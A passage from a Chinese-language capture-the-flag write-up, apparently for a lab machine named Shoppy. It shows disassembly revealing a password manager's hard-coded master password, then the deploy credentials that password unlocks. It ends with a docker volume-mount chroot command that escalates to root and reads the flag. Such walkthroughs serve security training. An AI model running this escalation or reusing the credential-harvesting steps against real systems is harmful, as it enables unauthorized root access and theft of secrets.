│ 0x000012cb e8a0fdffff call sym std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator+=(char const*) ; sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::operator_char_const_
│ 0x000012d0 488d45a0 lea rax, [var_60h]
│ 0x000012d4 488d35880d00. lea rsi, [0x00002063] ; u"ple"
│ 0x000012db 4889c7 mov rdi, rax
│ 0x000012de e88dfdffff call sym std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator+=(char const*) ; sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::operator_char_const_
│ 0x000012e3 488d45a0 lea rax, [var_60h]
│ 0x000012e7 488d35770d00. lea rsi, [0x00002065] ; u"le"
│ 0x000012ee 4889c7 mov rdi, rax
│ 0x000012f1 e87afdffff call sym std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator+=(char const*) ; sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::operator_char_const_
│ 0x000012f6 488d45a0 lea rax, [var_60h]
│ 0x000012fa 488d35660d00. lea rsi, [0x00002067] ; "e"
│ 0x00001301 4889c7 mov rdi, rax
│ 0x00001304 e867fdffff call sym std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator+=(char const*) ; sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::operator_char_const_
接着,程序会和我们输入的字符串和 Sample 字符一个一个的做对比
0x00001325 488d35440d00. lea rsi, str.Access_granted__Here_is_creds__ ; 0x2070 ; "Access granted! Here is creds !"
0x0000134d 488d3d3c0d00. lea rdi, str.cat__home_deploy_creds.txt ; 0x2090 ; "cat /home/deploy/creds.txt" ; const char *string
我们输入的字符串是 Sample 后,会输出 “Access granted! Here is creds !” 字符串,表示我们输入正确,然后会执行一个系统命令 “cat /home/deploy/creds.txt”,查看文件 /home/deploy/creds.txt 的内容。
现在我们回到靶机,来执行一下
jaeger@shoppy:/home/deploy$ sudo -u deploy ./password-manager
[sudo] password for jaeger:
Welcome to Josh password manager!
Please enter your master password: Sample
Access granted! Here is creds !
Deploy Creds :
username: deploy
password: Deploying@pp!
得到了一个账号密码,然后使用这个账号密码切换到用户 deploy
jaeger@shoppy:/home/deploy$ su deploy
Password:
$ whoami&&id
deploy
uid=1001(deploy) gid=1001(deploy) groups=1001(deploy),998(docker)
成功提权到 deploy 用户
Docker 越权
查询提权帮助
我们尝试一下是否可行
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# whoami&&id
root
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
成功越权到 root 权限
# cat /root/root.txt
e95c041905b2bb2a8fcbb6d9327e9d64
成功拿到 root 权限的 flag 文件